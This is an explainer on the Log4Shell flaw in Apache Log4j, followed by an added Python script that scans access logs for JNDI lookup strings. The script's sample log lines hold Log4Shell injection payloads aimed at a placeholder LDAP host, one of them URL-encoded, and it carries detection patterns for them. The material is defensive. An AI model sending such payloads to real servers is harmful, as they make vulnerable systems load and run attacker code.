Log4j was initially released in October 1999. It drew widespread attention in December 2021, when critical vulnerabilities in it were made public, and to this day threat actors still exploit that exposure.
Apache Log4j is one of the most widely used pieces of open-source software. It is a software library that runs within an application or Java service and logs all system events automatically. By nature, users are commonly unaware that it is running in the background.
David Nalley, president of the Apache Software Foundation, notes that “Logging is fundamental to any computer software or hardware operation. Whether it’s a phlebotomy machine or an application server, logging is going to be present.”
In the latter part of 2021, one critical flaw was identified in Log4j. When the library logs system events, it uses a standard set of interfaces for accessing the Java Naming and Directory Interface (JNDI).
Kaspersky tech author Leonid Grustniy recounts that the vulnerability is that, while logging, the library becomes capable of running JNDI commands passed to it in an event, such as the header field of a request, a chat message or even the description of a 404 error message.
According to Grustniy, “The vulnerability allows cybercriminals, at least theoretically, to do whatever they like on the victim’s system (if no additional security measures kick in). In practice, attackers often used Log4Shell to install illegal miners and carry out ransomware attacks. But there have been more exotic uses, including targeted attacks, spreading the Mirai botnet, and even RickRolling, playing the ‘Never Gonna Give You Up’ hit by 80s crooner Rick Astley.”
To this day, attackers are still actively exploiting Log4Shell, despite numerous patches deployed to prevent it from happening. According to Chainguard CEO Dan Lorenc, “Log4Shell is going to show up in data breaches for the next decade as part of the root cause—all it takes is one instance of Log4Shell to be vulnerable.” He also added that when the vulnerability was first detected, the entire cybersecurity community scrambled to ensure attackers would not be able to impact most consumers.
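Because the JNDI command arrives inside ordinary logged input such as a request header or a path that returns a 404, defenders can look for it in web server access logs. The following is an added example, not part of the original article: it assumes logs in the common Apache/Nginx "combined" format, and the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:01:09 +0000] "GET /%24%7BJNDI%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 153 "-" "curl/7.79"',
]

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)  # explicit JNDI lookup
LOOKUP = re.compile(r'\$\{')  # any other lookup expression; still worth review

def decode(value, rounds=3):
    """Undo up to `rounds` layers of URL-encoding so encoded input is compared in plain form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_no, client_ip, field, kind, status) for each suspicious field."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        for field in ("path", "referer", "agent"):  # client-controlled fields
            text = decode(m[field])
            if JNDI.search(text):
                kind = "jndi"
            elif LOOKUP.search(text):
                kind = "lookup"
            else:
                continue
            findings.append((line_no, m["ip"], field, kind, int(m["status"])))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows that a request carried a lookup string, not that the application behind the server logged it with a vulnerable Log4j version, so findings are leads for follow-up rather than proof of compromise.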